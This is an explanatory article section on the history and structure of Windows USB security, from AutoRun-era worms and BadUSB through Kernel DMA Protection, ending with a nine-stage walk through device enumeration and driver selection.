The inheritance is structural. AutoRun shipped in 1995, designed for write-once optical media in a sealed jewel case. Windows 2000 extended AutoRun to every mounted volume -- including the new USB thumb-drive class. A 1995 trust model for trusted physical media now protected read-write USB sticks anyone could carry between machines. Forty years later, that line in the lineage has not been redrawn.

timeline title Pre-USB removable-media trust, 1981 to 2000 1981 : IBM PC ships : Boot ROM jumps to sector 0 of inserted media 1986 : Brain virus : Lahore : First in-the-wild boot-sector virus 1987 : Stoned virus : Boot-sector class established 1991 : Michelangelo discovered : 3 February 1991, Australia 1992 : Michelangelo media panic : Trigger date 6 March 1992 1995 : Windows 95 RTM : AutoRun introduced for CD-ROM installers 1995 : USB-IF founded December 5 : Seven-company consortium 1996 : USB 1.0 designed January : Device-class architecture: peripheral declares its own class 1999 : USB Mass Storage 1.0 : Bulk-Only Transport specification 2000 : Windows 2000 usbstor.sys : AutoRun extends to USB volumes

Timeline sources, in row order: [@wiki-bootsector] for the IBM PC boot-sector contract; [@wiki-brain], [@wiki-stoned], and [@wiki-michelangelo] for the named-virus lineage and the 1992-not-1991 Michelangelo panic date; [@wiki-autorun] for the Windows 95 / AutoRun introduction; [@wiki-usbif] for the USB-IF founding date and seven-company consortium; [@wiki-usb] for the USB 1.0 January 1996 design date and the device-class architecture; [@usb-massbulk-pdf] for the USB Mass Storage Class Bulk-Only Transport 1.0 specification.

If the trust model is forty years old, the failure modes must be older than USB. They are. The first fifteen years of USB on Windows were a transport in search of a security model, and the bill came due in two famous worms.

3. The Pre-Hardening Era, 1996 to 2010

For its first fifteen years on Windows, USB was a transport in search of a security model. Drivers were unsigned on 32-bit. AutoRun was on. Descriptors were trusted. The bill was paid in two worms.

The Generation-1 stack was a USB 1.1 design retrofitted onto Windows 95 OSR2.1 in 1997 and refined for Windows 2000. The host-controller drivers (Usbuhci.sys, Usbohci.sys, and later Usbehci.sys for USB 2.0 high speed) sat below a single port driver, Usbport.sys; the hub driver was usbhub.sys. Microsoft's USB-3.0 architecture page documents the older 2.0 stack as the predecessor of the modern KMDF chain [@ms-usb-3-0-stack]. On 32-bit Windows, none of these binaries needed a Microsoft-trusted signature to load.

Windows 2000 added usbstor.sys, the function driver implementing the USB Mass Storage Class Bulk-Only protocol [@usb-massbulk-pdf]. Suddenly a thumb drive was a first-class read-write filesystem the user could carry between machines, and AutoRun -- a 1995 contract for CD-ROM application installers -- applied to it.The original autorun.inf was a sensible primitive. Insert a sealed jewel case, run the vendor's setup wizard, get a new application. Extending the contract to user-writable USB sticks broke the cardinal assumption: that the media's content was set by a trustworthy party at the factory and could not be modified in the field.

KMCS is the Windows policy that requires every kernel-mode binary -- every `.sys` file Windows loads into ring zero -- to carry a digital signature chaining to a Microsoft-trusted root certificate. KMCS has been mandatory on 64-bit Windows since Vista shipped in 2007. Microsoft Learn documents the signing-by-version matrix, the SHA-256 algorithm requirement, and the post-2016 narrowing of the cross-signed-CA exception. KMCS prevents an attacker from loading an arbitrary `.sys` file into the kernel. It does not, by itself, prevent an attacker from feeding malicious *data* to an already-signed `.sys` file.

The Conficker worm, first detected in November 2008, industrialized the AutoRun-on-USB era. Wikipedia summarizes its origin verbatim: "first detected in November 2008 ... uses flaws in Windows OS software (MS08-067 / CVE-2008-4250) and dictionary attacks on administrator passwords to propagate ... The first variant of Conficker, discovered in early November 2008, propagated through the Internet by exploiting a vulnerability in a network service (MS08-067)" [@wiki-conficker]. Conficker rode two completely separate vectors: a Server Service vulnerability (a path-canonicalization overflow in srvsvc.dll reachable over SMB on TCP 445 and via NetBIOS over TCP/IP on TCP 139) over the network [@nvd-cve-2008-4250], and autorun.inf-driven AutoPlay execution on inserted USB drives. The two propagation paths are independent and worth distinguishing.

Note: MS08-067 / CVE-2008-4250 is the Server Service RPC-over-SMB vulnerability (reachable on TCP 445 and via NetBIOS over TCP/IP on TCP 139) that gave Conficker its network propagation. NIST's NVD entry characterises the surface verbatim as "a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka 'Server Service Vulnerability'" [@nvd-cve-2008-4250]. The USB-side propagation came from autorun.inf on inserted thumb drives, not from MS08-067. The two vectors share a worm but not a vulnerability. Press accounts that conflate them tend to overstate what closing MS08-067 actually did to USB-borne malware in 2008.

Stuxnet followed in 2010. Wikipedia's article puts the timing and the vector verbatim: "Stuxnet is a malicious computer worm first uncovered on 17 June 2010 ... It is typically introduced to the target environment via an infected USB flash drive, thus crossing any air gap" [@wiki-stuxnet]. The technical primitive that let Stuxnet cross air gaps onto Iranian centrifuge-control PCs was CVE-2010-2568, a flaw in the Windows Shell's processing of .LNK shortcut icons. NIST's National Vulnerability Database entry preserves the verbatim characterization: "Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems" [@nvd-cve-2010-2568]. Microsoft Security Bulletin MS10-046 shipped the patch [@ms10-046].

Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010. -- NIST, National Vulnerability Database, CVE-2010-2568 [@nvd-cve-2010-2568]

Patch Tuesday, February 2011 closed the AutoRun pipeline outside Windows 7. Brian Krebs covered the rollout verbatim at the time: "Microsoft also issued an update that changes the default behavior in Windows when users insert a removable storage device, such as a USB or thumb drive. This update effectively disables 'autorun,' a feature of Windows that has been a major vector for malware over the years. Microsoft released this same update in February 2009, but it offered it as an optional patch. The only thing different about the update this time is that it is being offered automatically to users who patch through Windows Update or Automatic Update" [@krebs-feb2011]. The update originally shipped as an optional Windows-7-era fix; Microsoft made it automatic for XP, Vista, Server 2003, and Server 2008 in February 2011.

Six months later, the descriptor-parser surface itself was named for the first time. Andy Davis of NCC Group gave "USB -- Undermining Security Barriers" at Black Hat USA 2011. The verified NCC Group publication archive carries the talk and a one-line abstract [@ncc-davis-2011]. Davis fuzzed USB descriptors against the Windows kernel parser and demonstrated that the parser itself -- not the application layer, not AutoRun -- was kernel-mode adversarial-input attack surface. The talk did not name a single bug class; it named the class of bugs: anything that parses adversarial bytes in ring zero in a memory-unsafe language.

Why did none of these fixes survive structurally? Each was a single-bug closure. Disabling AutoRun did nothing about HID injection. Patching the LNK parser did nothing about the descriptor-parser surface. Signing kernel binaries did not change what those binaries trusted at runtime. Each fix shrank one bug class by one. The premise -- that a USB peripheral's self-declaration is its identity -- was untouched.

The post-2010 hardening of USB on Windows would change the surfaces around the descriptor parser. None of it would change the descriptor parser's contract.

4. Generation by Generation: Ten Acts of Hardening

The post-2010 hardening of USB on Windows is a ten-act story: signing, lockdown, watershed, silicon, policy. Each act addressed one premise, and exactly one premise, of the trust failure that came before it. None of them changed the foundational contract.

Generation 2 -- Vista x64 Kernel-Mode Code Signing (2007). Every USB function and class driver had to chain to a Microsoft-trusted root and use SHA-2 once 64-bit Vista landed. Microsoft Learn carries the signing-by-version matrix and the cross-signed-CA carve-out verbatim, including the post-2015 narrowing in which "Cross-signed drivers are still permitted if ... The PC was upgraded from an earlier release of Windows to Windows 10, version 1607 ... Drivers was signed with an end-entity certificate issued prior to July 29th 2015 that chains to a supported cross-signed CA" [@ms-kmcs]. Companion documentation describes the broader driver-signing pipeline [@ms-drvsigning]. For the full reinvention of code-identity verification on Windows, the sibling article on Windows app identity is the canonical reference [@paragmali-appid].

Generation 3 -- AutoRun and LNK lockdown (2009-2011). Already covered in Section 3. KB971029 and MS10-046, taken together, closed the autorun.inf-driven AutoPlay vector and the LNK-icon parsing flaw used by Stuxnet [@krebs-feb2011] [@nvd-cve-2010-2568].

Generation 4 -- The descriptor-parser surface and the USB 3.0 stack (2011-2012). Andy Davis named the surface at Black Hat 2011 [@ncc-davis-2011]. Windows 8 in 2012 shipped a new USB 3.0 stack written from scratch on Microsoft's Kernel-Mode Driver Framework. The architectural reference confirms the rebuild verbatim: "Microsoft created the USB 3.0 drivers by using Kernel Mode Driver Framework (KMDF) interfaces ... Usbhub3.sys ... Manages USB hubs and their ports ... Enumerates devices and other hubs ... Creates physical device objects (PDOs)" [@ms-usb-3-0-stack]. The new stack changed the codebase the descriptor parser ran in. It did not change the contract the descriptor parser had to honor.

The Human Interface Device class is a USB device-class specification originally designed for keyboards, mice, joysticks, and similar input devices. A USB device declares itself HID by setting `bInterfaceClass=0x03` in its interface descriptor. Once Windows accepts that declaration, the device is allowed to inject keyboard and pointer events into the active session as if a human were operating a physical keyboard. The HID class has no provision for authenticating that the device is, in fact, a keyboard rather than a reprogrammed thumb drive emulating one; the class definition is itself the attack surface.

Generation 5 -- BadUSB watershed (Black Hat USA 2014). Karsten Nohl, Sascha Krißler, and Jakob Lell of SR Labs presented BadUSB -- On Accessories That Turn Evil [@nohl-wiki]. The SR Labs slide deck's title page is preserved verbatim, with all three authors named, on a mirrored PDF [@srlabs-badusb-pdf]; Wikipedia's BadUSB article also preserves the three-author attribution and the underlying primitive: "USB flash drives can contain a programmable Intel 8051 microcontroller" [@wiki-badusb].Wired's contemporaneous press coverage credited only Nohl and Lell; Krißler's name was dropped in the popular write-up. The SR Labs slide deck and the Wikipedia article both preserve the full three-author attribution. Press attributions of conference talks routinely shed authors; the slide-deck title page is the durable source. Two months after Black Hat, Adam Caudill and Brandon Wilson released the Psychson toolchain at DerbyCon 2014, demonstrating end-to-end reflash of the Phison PS2251-03 controller. The repository README confirms the lineage verbatim: "this is 8051 custom firmware written in C ... firmware patches have only been tested against PS2251-03 firmware version 1.03.53 ... DriveCom ... EmbedPayload ... Injector ... Huge thanks to the Hak5 team for their work on the excellent USB Rubber Ducky" [@psychson-repo]. Wired's October 2014 follow-up carries Caudill's verbatim release rationale from the DerbyCon stage: "The belief we have is that all of this should be public. It shouldn't be held back. So we're releasing everything we've got" [@wired-2014-10]. The same article quotes Nohl's verbatim architectural verdict on the underlying protocol: "to prevent USB devices' firmware from being rewritten, their security architecture would need to be fundamentally redesigned ... it could take 10 years or more to iron out the USB standard's bugs and pull existing vulnerable devices out of circulation" [@wired-2014-10].

It could take 10 years or more to iron out the USB standard's bugs and pull existing vulnerable devices out of circulation. -- Karsten Nohl, SR Labs, quoted in Wired, October 2014 [@wired-2014-10]

Generation 6 -- HID-as-weapon era (2010-present). The Hak5 USB Rubber Ducky -- introduced in 2010 by Hak5 founder Darren Kitchen, who pioneered the keystroke-injection technique [@hak5-ducky-docs] -- commercialized the HID-injection primitive four years before BadUSB was disclosed. The Mark II hardware is still sold today [@hak5-shop-ducky], and DuckyScript v1 (2011) and v3 (2022) are documented end-to-end on the Hak5 documentation portal [@hak5-ducky-docs].The commercial HID-injection device predates the academic disclosure by four years. By the time BadUSB hit Black Hat in August 2014, Hak5 had already been selling a packaged keystroke-injection thumb drive at consumer prices for four years. "BadUSB" academicized what penetration testers were already shipping in mailers. The O.MG Cable, released by Mischief Gadgets, embedded the implant inside a USB-A-to-Lightning charging cable form factor and put a WiFi beacon inside it. The product page states the design intent verbatim: "O.MG Cables are hand made USB cables with an advance WiFi implant inside. Designed to allow Red Teams to emulate sophisticated attack scenarios previously only capable with $20,000 cables" [@omg-cable]. The FBI's March 2020 FLASH alert -- reported by BleepingComputer at the time -- confirmed organized cybercriminal actors mailing the same primitive: "Hackers from the FIN7 cybercriminal group have been targeting various businesses with malicious USB devices acting as a keyboard when plugged into a computer ... These USB drives are configured to emulate keystrokes that launch a PowerShell command to retrieve malware from server controlled by the attacker" [@bleeping-fin7]. The FBI repeated the warning with a follow-on FLASH alert in January 2022 that extended the targeting to transportation, insurance, and defense companies [@wiki-badusb].

Generation 7 -- Thunderbolt DMA and Thunderclap (NDSS 2019), Thunderspy (2020). Theodore Markettos, Colin Rothwell, Brett Gutstein, Allison Pearce, Peter Neumann, Simon Moore, and Robert Watson of Cambridge, Rice, and SRI demonstrated peripheral DMA attacks against IOMMU-on platforms via shared-IOMMU-context attacks. Their NDSS 2019 paper concludes verbatim: "Windows only uses the IOMMU in limited cases and remains vulnerable" [@ndss-thunderclap]. One year later, Björn Ruytenberg of Eindhoven University released Thunderspy, a family of seven vulnerabilities extending the attack surface to firmware-reflash of the Thunderbolt controller itself: "All the attacker needs is 5 minutes alone with the computer, a screwdriver, and some easily portable hardware" [@thunderspy]. Wikipedia preserves the May 10, 2020 disclosure date [@thunderspy-wiki].

Generation 8 -- Kernel DMA Protection (Windows 10 1803, April 2018). This is the first Windows USB-adjacent defense that targeted trust below the descriptor parser rather than the parser itself. Microsoft Learn names the primitive verbatim: "Windows uses the system Input/Output Memory Management Unit (IOMMU) to block external peripherals from starting and performing DMA, unless the drivers for these peripherals support memory isolation (such as DMA-remapping) ... By default, peripherals with DMA Remapping incompatible drivers are blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen" [@ms-kdp]. Per-driver opt-in is documented separately [@ms-dmaremap]. The same Microsoft Learn page is explicit about what KDP does not defend: "Kernel DMA Protection feature doesn't protect against DMA attacks via 1394/FireWire, PCMCIA, CardBus, or ExpressCard". A USB 2.0 thumb drive performs no DMA at all; KDP is silent on it.

Kernel DMA Protection is the Windows defense that uses the platform's IOMMU (Intel VT-d, AMD-Vi, or an ARM equivalent) to confine externally connected PCIe-class peripherals to device-private memory windows. With KDP armed, a Thunderbolt or USB4 peripheral cannot read arbitrary kernel memory by issuing DMA requests, even if its driver is malicious or buggy. KDP is opt-in at three levels: silicon (the platform must have an IOMMU), firmware (the UEFI must publish DMAR / IVRS tables), and driver (the driver must declare `DmaRemappingCompatible=1` in its INF). KDP does not protect against attacks delivered through descriptor parsing, HID injection, or mass-storage exfiltration.

Generation 9 -- USB Type-C UCM stack (Windows 10 1607, 2016). The User-mode Connector Manager class extension family -- UcmCx.sys, UcmUcsiCx.sys, UcmTcpciCx.sys -- brought Power Delivery, Alternate Mode (DisplayPort, Thunderbolt, USB4), and bidirectional power-role negotiation into the Windows driver model. Microsoft Learn names the architecture verbatim: "UCM is designed by using the WDF class extension-client driver model" [@ms-typec].

Generation 10 -- Defender, ASR, and Device Control unification (2018-2024). The Attack Surface Reduction rule set, documented in Microsoft's ASR-rule-to-GUID matrix [@ms-asr-rules], includes the rule Block untrusted and unsigned processes that run from USB with GUID b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4. Microsoft Defender for Endpoint Device Control followed, generally available in 2024, with per-VID/PID, per-serial-number, per-operation, and per-user policy primitives [@ms-devcontrol]. Together with the older Group Policy Device Installation Restrictions framework [@ms-gpo-devinstall] and the system-defined Device Setup Class GUIDs [@ms-devsetupclasses], these form the deployable enterprise triangle around the BadUSB / HID-injection problem.

timeline title Ten generations of Windows USB hardening 1996 : Gen 1 : Original USB stack ships ; unsigned 32-bit drivers 2007 : Gen 2 : KMCS on Vista x64 ; mandatory signed kernel binaries 2009-2011 : Gen 3 : AutoRun and LNK lockdown ; KB971029 and MS10-046 2011 : Gen 4 : Andy Davis names the descriptor parser surface 2012 : Gen 4 cont. : USB 3.0 KMDF stack ships in Windows 8 2014 : Gen 5 : BadUSB watershed ; SR Labs at Black Hat 2010-2024 : Gen 6 : HID-as-weapon era ; Rubber Ducky to O.MG Cable 2019-2020 : Gen 7 : Thunderclap and Thunderspy ; IOMMU is not enough 2018 : Gen 8 : Kernel DMA Protection ; Windows 10 1803 2016 : Gen 9 : USB Type-C UCM stack ; Windows 10 1607 2018-2024 : Gen 10 : ASR, Device Control, GPO triangle ; Defender for Endpoint

Sources, in row order: [@ms-usb-3-0-stack] for the USB 2.0 stack and the USB 3.0 KMDF rewrite; [@ms-kmcs] for the Vista x64 signing transition; [@krebs-feb2011] and [@nvd-cve-2010-2568] for the AutoRun-and-LNK lockdown; [@ncc-davis-2011] for the Andy Davis Black Hat 2011 talk; [@srlabs-badusb-pdf] and [@wiki-badusb] for the BadUSB three-author SR Labs disclosure; [@hak5-shop-ducky], [@hak5-ducky-docs], [@omg-cable], and [@bleeping-fin7] for the HID-as-weapon lineage; [@ndss-thunderclap] and [@thunderspy] for the IOMMU attack family; [@ms-kdp] and [@ms-dmaremap] for Kernel DMA Protection; [@ms-typec] for the Type-C UCM stack; [@ms-asr-rules], [@ms-devcontrol], [@ms-gpo-devinstall], and [@ms-devsetupclasses] for the modern enterprise policy triangle.

Note: Ten generations of Windows USB hardening. Signing on top, IOMMU underneath, policy frameworks around the edges. Every one of them addressed a surface adjacent to the descriptor parser. None addressed the contract the descriptor parser has to honor: that the peripheral's self-declared identity is the only identity the host gets. Until USB-IF Authentication 1.0 ships in commodity silicon, that contract is going to outlast every defense in this section.

Ten generations of hardening, each closing a single attack surface, each leaving the descriptor-trust contract intact. The single defense that should close it -- USB-IF Authentication 1.0, published January 2019 -- is the next section's reckoning.

5. The Modern USB Stack as a Multi-Stage Verifier

We have walked forty years of inheritance and ten generations of layered hardening. Now we are going to do the thing the rest of this article rests on: walk a single USB device, from the millisecond it makes electrical contact to the moment a class driver attaches to it, through the nine stages Windows 11 25H2 actually executes -- by named binary, by descriptor, by trust decision.

Those nine stages are a reorganisation of §1's eleven kernel-mode operations, not a different list. §1's three physical-detection operations -- port-status interrupt, port reset, speed detection -- fuse into Stage 1; §1's three default-address descriptor operations (initial 8-byte fetch, SET_ADDRESS, full 18-byte fetch) fuse into Stage 2; §1's combined INF-search-and-KMCS operation splits into Stages 6 and 7; and a new Stage 9 covers the IOMMU enforcement Kernel DMA Protection performs after the class driver attaches. The arithmetic is eleven minus two minus two plus one plus one equals nine. The StudyGuide question 1 at the foot of this article retains the §1 framing for exam purposes; the per-stage walk below uses the §5 reorganisation.

sequenceDiagram participant Dev as USB device participant XHCI as usbxhci.sys (host controller) participant Hub as usbhub3.sys (hub driver) participant CCGP as usbccgp.sys (composite parent) participant PnP as PnP manager participant IO as I/O manager participant Cls as Class driver (e.g. hidclass.sys) Dev->>XHCI: Stage 1 -- electrical attach + port status change XHCI->>Dev: Port reset + speed detection XHCI->>Hub: New device on port N (default address 0) Hub->>Dev: Stage 2 -- GET_DESCRIPTOR (device, first 8 bytes) Hub->>Dev: SET_ADDRESS Hub->>Dev: GET_DESCRIPTOR (device, full 18 bytes) Hub->>Dev: Stage 3 -- GET_DESCRIPTOR (config, first 9 bytes) Hub->>Dev: GET_DESCRIPTOR (config, full wTotalLength) Hub->>CCGP: Stage 4 -- composite split (if bDeviceClass=0x00 or IAD present) CCGP->>PnP: Per-interface PDOs PnP->>PnP: Stage 5 -- synthesize hardware + compatible IDs PnP->>PnP: Stage 6 -- INF database search with rank scoring PnP->>IO: Stage 7 -- KMCS check on chosen function driver IO->>Cls: Stage 8 -- attach class driver to device node IO->>IO: Stage 9 -- IOMMU policy (KDP, if armed)

The sources for each stage are cited inline in the prose that follows. We will walk all nine.

Stage 1: Physical detection (`usbxhci.sys`)

The xHCI host controller's hardware raises a port-status-change interrupt when a downstream port detects electrical attach. The host-controller driver -- usbxhci.sys on Windows 8 and newer -- handles the interrupt, drives the port through a reset, and detects the device's negotiated speed: Low (1.5 Mbps), Full (12 Mbps), High (480 Mbps), Super (5 Gbps), or Super+ Speed (10 Gbps and beyond) [@wiki-usb]. Microsoft's architecture documentation names this verbatim: "The xHCI driver is the USB 3.0 host controller driver" and pairs with the framework-derived host-controller extension Ucx01000.sys [@ms-usb-3-0-stack]. The device, at this point, has no identity. It has a port number and a speed. It does not yet have a USB bus address; it lives at the default address (zero) until the hub assigns one.

Stage 2: Initial device-descriptor fetch (`usbhub3.sys`)

The hub driver, usbhub3.sys, issues the first control transfer. The request is bmRequestType=0x80, bRequest=GET_DESCRIPTOR, wValue=0x0100, wLength=8 -- "give me the first eight bytes of the device descriptor at default address zero." The first eight bytes carry the bMaxPacketSize0 field, which tells the host how to size subsequent control transfers. SET_ADDRESS assigns a real bus address. A second GET_DESCRIPTOR then retrieves the full eighteen-byte USB_DEVICE_DESCRIPTOR.

This is the descriptor parser's first contact with attacker-controlled bytes -- the surface Andy Davis demonstrated as exploitable at Black Hat 2011 [@ncc-davis-2011]. The binary doing the parsing is usbhub3.sys, the same hub driver §4 Generation 4 names verbatim from the architecture reference [@ms-usb-3-0-stack]. The hub driver runs in ring zero. The bytes it parses originate in the peripheral's firmware. The trust contract is one-way.

Stage 3: Configuration-descriptor fetch

The hub driver issues a third GET_DESCRIPTOR for the first nine bytes of USB_CONFIGURATION_DESCRIPTOR to learn the wTotalLength field; a fourth fetch retrieves the full configuration, which includes one or more USB_INTERFACE_DESCRIPTORs, each followed by its USB_ENDPOINT_DESCRIPTORs and any class-specific descriptors (HID report descriptors, mass-storage CSW formats, audio control units).The two-fetch pattern -- read nine bytes to learn the size, then re-read the full block -- is a perfectly sensible engineering optimization. It also doubles the number of attacker-controlled parser entries the hub driver executes per insertion. The pragmatic optimization and the widened attack surface are the same line of code. All of this is parsed in usbhub3.sys [@ms-usb-3-0-stack]. This stage is the bulk of the kernel's adversarial-input surface for USB.

A composite USB device is a single physical peripheral that declares multiple independent interfaces. A common pattern is a wireless-keyboard-and-mouse receiver that presents one USB interface for the keyboard and a second for the mouse. The host treats each interface as a separate logical device and binds a class driver to each. Composite-device handling is the structural primitive that makes the BadUSB *"mass storage device that also presents a HID keyboard interface"* attack possible inside an unmodified USB peripheral.

Stage 4: Composite-device split (`usbccgp.sys`)

If the device descriptor's bDeviceClass is 0x00 (deferred to interface), or its bDeviceClass / bDeviceSubClass / bDeviceProtocol triple is 0xEF / 0x02 / 0x01 (the Multi-Interface Function class signalled by Interface Association Descriptors), and the device has more than one interface and a single configuration, the hub bus driver synthesizes an additional compatible ID of USB\COMPOSITE. The PnP manager's INF search then matches that compatible ID against Usb.inf and loads the generic parent driver. Microsoft Learn states the architecture verbatim: "the USB generic parent driver (Usbccgp.sys) ... the generic parent driver enumerates each of these interfaces as a separate device" [@ms-ccgp]; the USB 3.0 architecture page is verbatim about which layer does the synthesis: "The hub driver enumerates and loads the parent composite driver if deviceClass is 0 or 0xef and numInterfaces is greater than 1 in the device descriptor" [@ms-usb-3-0-stack]. usbccgp.sys then creates one child physical device object (PDO) per interface and lets the PnP manager bind a class driver to each independently. This is the moment a single physical thumb drive can become a thumb drive and a HID keyboard. Nothing in this stage cross-checks whether the combination is a plausible product; the device has declared it, and the host honors the declaration.

Stage 5: Hardware-ID and compatible-ID synthesis

The PnP manager builds two ordered lists from the descriptor fields it just parsed:

Hardware IDs (most specific): USB\VID_xxxx&PID_xxxx&REV_xxxx, USB\VID_xxxx&PID_xxxx, and for composite devices USB\VID_xxxx&PID_xxxx&MI_xx (interface number) [@ms-hwids].
Compatible IDs (fallback): USB\Class_xx&SubClass_xx&Prot_xx, then USB\Class_xx&SubClass_xx, then USB\Class_xx [@ms-compatids].

A hardware ID is the most specific identifier the Plug-and-Play manager uses to bind a driver to a device. For USB, the canonical hardware ID is `USB\VID_xxxx&PID_xxxx&REV_xxxx`, derived directly from the device descriptor's `idVendor`, `idProduct`, and `bcdDevice` fields. A driver INF that names a hardware ID exactly will outrank any compatible-ID match in the rank-scored search; vendors use this to ship a vendor-specific function driver for their own hardware. A compatible ID is a generic identifier the Plug-and-Play manager falls back to when no driver INF names the device's hardware ID. For USB, compatible IDs are class-coded: `USB\Class_03&SubClass_01&Prot_01` is a boot-protocol keyboard, `USB\Class_08&SubClass_06&Prot_50` is a SCSI-transparent mass-storage device. The inbox Microsoft class drivers (`hidusb.sys`, `usbstor.sys`, and so on) are registered against compatible IDs, which is why an unbranded thumb drive with no vendor INF still gets a working class driver on Windows.

Stage 6: INF database search with rank scoring

The PnP manager hands the two lists to the driver-store INF search. The algorithm is documented under "How Setup Selects Drivers" [@ms-pnp-rank] and is rank-arithmetic: each candidate INF is assigned a 32-bit rank, lowest wins. Roughly speaking, the rank is composed from three terms: an ID-match term (hardware-ID hit beats compatible-ID hit, and a higher hardware-ID in the list beats a lower one), a signer-trust term (a Microsoft-signed driver outranks a third-party-signed driver of equal ID specificity), and an OS-version term. The chosen INF's [Models] section names the function driver [@ms-inf]. The two-phase driver-package model (introduced in Windows 8) first installs the best driver-store match for fast operation, then queries Windows Update separately for a potentially better match [@ms-pnp-rank].

Worked example. A USB Mass Storage device exposes hardware ID USB\VID_0951&PID_1666 (a Kingston DataTraveler) and compatible ID USB\Class_08&SubClass_06&Prot_50 (SCSI-transparent bulk-only). The driver store contains the Microsoft inbox INF (usbstor.inf) registered against the compatible ID and signed by Microsoft, and a third-party INF registered against the hardware ID and signed by a paid-up OEM. The rank arithmetic decides which one wins.

flowchart TD Dev["Device exposes:
HWID=USB\VID_0951&PID_1666
CompatID=USB\Class_08&SubClass_06&Prot_50"] Dev --> Store["Driver store search"] Store --> A["Candidate A: usbstor.inf
Match on CompatID
Signer: Microsoft (rank 0x00)"] Store --> B["Candidate B: vendor.inf
Match on HWID
Signer: OEM (rank 0x01)"] A --> ARank["A.rank = HWID_RANK_BASE + CompatID_term + 0x00
= 0x0000 + 0x1003 + 0x00
= 0x1003"] B --> BRank["B.rank = HWID_term + Signer_term
= 0x0000 + 0x01
= 0x0001"] ARank --> D{"Compare ranks (lowest wins)"} BRank --> D D --> Win["B wins: vendor.inf binds to USB\VID_0951&PID_1666"]

The exact numeric constants are policy-controlled and vary by Windows version; the structural ordering is documented [@ms-pnp-rank] [@ms-hwids] [@ms-compatids] [@ms-inf]. The takeaway is that a USB device with no hardware-ID-specific INF in the driver store always falls back to the Microsoft inbox class driver matched on compatible ID, which is why an arbitrary thumb drive declaring bInterfaceClass=0x08 always finds usbstor.sys ready to load.

{` // Simplified model of the documented rank-scoring algorithm. // Lower numeric rank wins; the exact constants are version-policy controlled.

const HWID_BASE = 0x0000; const COMPATID_BASE = 0x1000; const POSITION_STEP = 0x0001; const SIGNER = { MICROSOFT: 0x00, OEM: 0x01, THIRD_PARTY: 0x02, UNSIGNED: 0x80 };

function rank(match) { const idTerm = match.kind === "HWID" ? HWID_BASE : COMPATID_BASE; const positionTerm = match.position * POSITION_STEP; return idTerm + positionTerm + SIGNER[match.signer]; }

const candidates = [ { name: "usbstor.inf (Microsoft inbox)", kind: "COMPATID", position: 3, signer: "MICROSOFT" }, { name: "vendor.inf (Kingston OEM)", kind: "HWID", position: 0, signer: "OEM" }, ];

const ranked = candidates .map(c => ({ ...c, rank: rank(c).toString(16).padStart(4, "0") })) .sort((a, b) => parseInt(a.rank, 16) - parseInt(b.rank, 16));

for (const c of ranked) console.log(`rank=0x${c.rank} ${c.name}`); console.log("Winner:", ranked[0].name); `}

Stage 7: KMCS verification of the chosen driver

The function driver named in the winning INF is loaded. Before the I/O manager attaches it, the loader checks its signature against the Kernel-Mode Code Signing policy: signature must chain to a Microsoft-trusted root, use SHA-256, and -- if Hypervisor-Enforced Code Integrity is enabled -- pass HVCI's per-page integrity check. The driver block list and the vulnerable-driver block list are consulted. The full signing-by-version matrix is documented on Microsoft Learn [@ms-kmcs] [@ms-drvsigning].

This is the canonical aha moment of the article. Kernel-Mode Code Signing certifies the driver. It does not certify what the driver consumes.

Imagine the system from KMCS's point of view. The Microsoft-signed `hidclass.sys` arrives at the kernel-mode loader. Its signature chains to a Microsoft-trusted root, its hash is correct, the HVCI memory-integrity policy is satisfied. Everything KMCS is asked to verify is verified. `hidclass.sys` loads.

At runtime, hidclass.sys accepts whatever HID input event arrives on the wire. The bytes that arrive carry no signature. The peripheral that produced them was never authenticated. KMCS protects the kernel from a malicious driver; the threat model assumes the data the driver consumes is honest. Against BadUSB, that assumption is exactly the inverse of true. The signed hidclass.sys is the attacker's tool: it is the binary that injects the malicious keystrokes into the active session.

KMCS is not broken. The work it does is real and necessary; without it, the BadUSB primitive would also let an attacker load arbitrary .sys files. KMCS just does not solve, and is not in the threat model of, the descriptor-trust problem. That gap is the article's recurring point.

Stage 8: Class-driver attachment

With the rank scoring decided and the function driver KMCS-verified, the I/O manager attaches the driver to the new device node and the class driver begins serving I/O. The function driver is drawn from the inbox class-driver roster catalogued in §6 -- hidclass.sys and hidusb.sys for HID; usbstor.sys for mass storage; winusb.sys for vendor-specific generic access via the Microsoft OS Descriptor mechanism [@ms-winusb]; the UcmCx.sys family for Type-C connector management [@ms-typec]; and the rest of the inbox roster in §6 [@ms-usb-3-0-stack]. This is the moment a USB device transitions from a parsed PDO to a binding that exposes per-class I/O semantics to user-mode -- the IRQL boundary at which descriptor-trust becomes operational rather than merely synthesised.

Stage 9: IOMMU enforcement (Kernel DMA Protection)

If Kernel DMA Protection is armed and the device is externally connected via a PCIe-tunneling fabric (Thunderbolt 3, Thunderbolt 4, USB4), the platform IOMMU places the device behind a device-specific translation domain. Pre-login DMA is blocked. Post-login DMA is allowed only into the device's own sandboxed memory if the driver opted in with DmaRemappingCompatible=1 in its INF [@ms-dmaremap]. KDP performs the IOMMU-mediated peripheral confinement quoted verbatim in §4 Generation 8 [@ms-kdp]. The deeper architectural treatment of Windows's hypervisor-enforced isolation primitives lives in the sibling article on the secure kernel and Virtualization-Based Security.

An IOMMU is a hardware unit that sits between peripherals and main memory, translating peripheral-issued DMA addresses through a per-device page table the operating system controls. Intel's implementation is called VT-d; AMD's is AMD-Vi; ARM platforms expose a System Memory Management Unit (SMMU). With an IOMMU enabled and configured by the OS, a peripheral that issues a DMA read to an address outside its sandboxed memory region gets a translation fault instead of a successful read. Without an IOMMU -- or with the IOMMU not enforcing policy on a given device -- peripheral DMA is unrestricted physical-address access to the kernel.

A USB 2.0 thumb drive performs no DMA. KDP is silent on it.

